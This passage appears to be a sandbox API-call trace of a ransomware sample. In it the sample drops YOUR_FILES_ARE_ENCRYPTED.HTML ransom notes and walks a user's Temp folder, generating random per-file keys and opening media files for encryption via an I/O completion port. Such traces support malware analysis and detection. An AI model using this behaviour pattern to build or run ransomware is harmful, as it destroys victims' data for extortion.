ftLastWriteTime.dwLowDateTime=0xec8fc8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsAlarms", cAlternateFileName="MICROS~1.WIN")) returned 0 [0121.951] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.951] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0121.951] GetProcessHeap () returned 0x600000 [0121.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\publishers\\8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.953] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.954] CloseHandle (hObject=0x214) returned 1 [0121.954] GetProcessHeap () returned 0x600000 [0121.954] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.954] GetProcessHeap () returned 0x600000 [0121.954] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.955] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 0 [0121.955] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.955] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0121.955] GetProcessHeap () returned 0x600000 [0121.955] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\publishers\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0121.956] WriteFile (in: hFile=0x30c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0121.957] CloseHandle (hObject=0x30c) returned 1 [0121.957] GetProcessHeap () returned 0x600000 [0121.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.957] GetProcessHeap () returned 0x600000 [0121.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.958] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x90350b81, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x90350b81, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.958] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.958] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 44 [0121.958] GetProcessHeap () returned 0x600000 [0121.958] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.959] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp" [0121.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\*" [0121.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x90350b81, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa6d8a24a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0121.959] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x90350b81, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa6d8a24a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0121.959] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c72bf50, ftCreationTime.dwHighDateTime=0x1d705eb, ftLastAccessTime.dwLowDateTime=0xddd19c20, ftLastAccessTime.dwHighDateTime=0x1d707d1, ftLastWriteTime.dwLowDateTime=0xddd19c20, ftLastWriteTime.dwHighDateTime=0x1d707d1, nFileSizeHigh=0x0, nFileSizeLow=0x965a, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="7A ttb5_cWF1ZkeL.wav", cAlternateFileName="7ATTB5~1.WAV")) returned 1 [0121.959] StrStrIW (lpFirst="7A ttb5_cWF1ZkeL.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.959] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav") returned 65 [0121.959] PathFindExtensionW (pszPath="7A ttb5_cWF1ZkeL.wav") returned=".wav" [0121.959] lstrlenW (lpString=".wav") returned 4 [0121.959] PathFindExtensionW (pszPath="7A ttb5_cWF1ZkeL.wav") returned=".wav" [0121.959] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\7a ttb5_cwf1zkel.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0121.960] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=38490) returned 1 [0121.960] GetProcessHeap () returned 0x600000 [0121.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.962] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B6") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="8F") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="1F") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="5F") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="D9") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="71") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="82") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="0E") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="67") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="D7") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F0") returned 2 [0121.962] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="8F") returned 2 [0121.962] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B3") returned 2 [0121.962] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="3F") returned 2 [0121.962] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="91") returned 2 [0121.962] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="8A") returned 2 [0121.962] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="60") returned 2 [0121.962] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="9D") returned 2 [0121.963] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="AE") returned 2 [0121.963] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="8F") returned 2 [0121.963] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="F1") returned 2 [0121.963] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="AF") returned 2 [0121.963] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="4E") returned 2 [0121.963] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="4A") returned 2 [0121.963] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="40") returned 2 [0121.963] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="E1") returned 2 [0121.963] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="53") returned 2 [0121.963] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="E3") returned 2 [0121.963] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="F4") returned 2 [0121.963] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="21") returned 2 [0121.963] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="01") returned 2 [0121.963] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="57") returned 2 [0121.963] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\7A ttb5_cWF1ZkeL.wav" [0121.963] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.963] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.963] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5969c3d0, ftCreationTime.dwHighDateTime=0x1d70499, ftLastAccessTime.dwLowDateTime=0x8a63ab10, ftLastAccessTime.dwHighDateTime=0x1d7096a, ftLastWriteTime.dwLowDateTime=0x8a63ab10, ftLastWriteTime.dwHighDateTime=0x1d7096a, nFileSizeHigh=0x0, nFileSizeLow=0x7eb8, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="9YpZDvMy.mp3", cAlternateFileName="")) returned 1 [0121.963] StrStrIW (lpFirst="9YpZDvMy.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.963] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3") returned 57 [0121.964] PathFindExtensionW (pszPath="9YpZDvMy.mp3") returned=".mp3" [0121.964] lstrlenW (lpString=".mp3") returned 4 [0121.964] PathFindExtensionW (pszPath="9YpZDvMy.mp3") returned=".mp3" [0121.964] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9ypzdvmy.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0121.964] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=32440) returned 1 [0121.964] GetProcessHeap () returned 0x600000 [0121.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0121.966] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="68") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="49") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="EE") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="09") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="93") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="74") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="94") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="77") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="75") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="D6") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="7B") returned 2 [0121.966] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="29") returned 2 [0121.966] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="CA") returned 2 [0121.966] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="A6") returned 2 [0121.967] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="E2") returned 2 [0121.967] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="F4") returned 2 [0121.967] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="AF") returned 2 [0121.967] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0C") returned 2 [0121.967] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="09") returned 2 [0121.967] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="7D") returned 2 [0121.967] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="5D") returned 2 [0121.967] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="D0") returned 2 [0121.967] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="92") returned 2 [0121.967] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="D5") returned 2 [0121.967] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="57") returned 2 [0121.967] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="98") returned 2 [0121.967] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="7D") returned 2 [0121.967] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="AC") returned 2 [0121.967] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="03") returned 2 [0121.967] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="25") returned 2 [0121.967] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="0A") returned 2 [0121.967] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="6C") returned 2 [0121.967] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3" [0121.967] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.967] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0121.968] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fffd100, ftCreationTime.dwHighDateTime=0x1d6fdc4, ftLastAccessTime.dwLowDateTime=0xb0f6aca0, ftLastAccessTime.dwHighDateTime=0x1d6fe16, ftLastWriteTime.dwLowDateTime=0xb0f6aca0, ftLastWriteTime.dwHighDateTime=0x1d6fe16, nFileSizeHigh=0x0, nFileSizeLow=0xbc47, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="a73NzFugbk4hbW 2bt2.wav", cAlternateFileName="A73NZF~1.WAV")) returned 1 [0121.968] StrStrIW (lpFirst="a73NzFugbk4hbW 2bt2.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.968] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav") returned 68 [0121.968] PathFindExtensionW (pszPath="a73NzFugbk4hbW 2bt2.wav") returned=".wav" [0121.968] lstrlenW (lpString=".wav") returned 4 [0121.968] PathFindExtensionW (pszPath="a73NzFugbk4hbW 2bt2.wav") returned=".wav" [0121.968] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\a73nzfugbk4hbw 2bt2.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.968] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=48199) returned 1 [0121.968] GetProcessHeap () returned 0x600000 [0121.968] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0121.970] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="98") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="3D") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="85") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="4A") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="09") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="D7") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="D2") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="E9") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="4B") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="A5") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="AC") returned 2 [0121.970] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="31") returned 2 [0121.970] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="01") returned 2 [0121.970] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="0B") returned 2 [0121.970] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="40") returned 2 [0121.970] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="AC") returned 2 [0121.970] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="5C") returned 2 [0121.970] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="E2") returned 2 [0121.970] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="75") returned 2 [0121.970] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="66") returned 2 [0121.970] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="FE") returned 2 [0121.970] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="AA") returned 2 [0121.970] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="99") returned 2 [0121.970] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="EF") returned 2 [0121.970] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="83") returned 2 [0121.970] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="83") returned 2 [0121.970] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B9") returned 2 [0121.970] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="0D") returned 2 [0121.970] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="80") returned 2 [0121.970] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="53") returned 2 [0121.970] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="6E") returned 2 [0121.970] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="70") returned 2 [0121.971] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav" [0121.971] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.971] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0121.971] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10383960, ftCreationTime.dwHighDateTime=0x1d6fd66, ftLastAccessTime.dwLowDateTime=0xfabd4960, ftLastAccessTime.dwHighDateTime=0x1d70731, ftLastWriteTime.dwLowDateTime=0xfabd4960, ftLastWriteTime.dwHighDateTime=0x1d70731, nFileSizeHigh=0x0, nFileSizeLow=0x54be, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="aZoLiC1tIka7YX122MG.m4a", cAlternateFileName="AZOLIC~1.M4A")) returned 1 [0121.971] StrStrIW (lpFirst="aZoLiC1tIka7YX122MG.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.971] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a") returned 68 [0121.971] PathFindExtensionW (pszPath="aZoLiC1tIka7YX122MG.m4a") returned=".m4a" [0121.971] lstrlenW (lpString=".m4a") returned 4 [0121.971] PathFindExtensionW (pszPath="aZoLiC1tIka7YX122MG.m4a") returned=".m4a" [0121.971] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\azolic1tika7yx122mg.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0121.972] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=21694) returned 1 [0121.972] GetProcessHeap () returned 0x600000 [0121.972] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0121.974] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="9A") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="0A") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="21") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="C4") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="21") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="29") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="27") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="AC") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B0") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="47") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="E6") returned 2 [0121.974] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="6C") returned 2 [0121.974] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="4A") returned 2 [0121.974] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="3C") returned 2 [0121.974] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="2C") returned 2 [0121.974] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="79") returned 2 [0121.974] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="23") returned 2 [0121.974] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="FA") returned 2 [0121.975] wsprintfW (in: 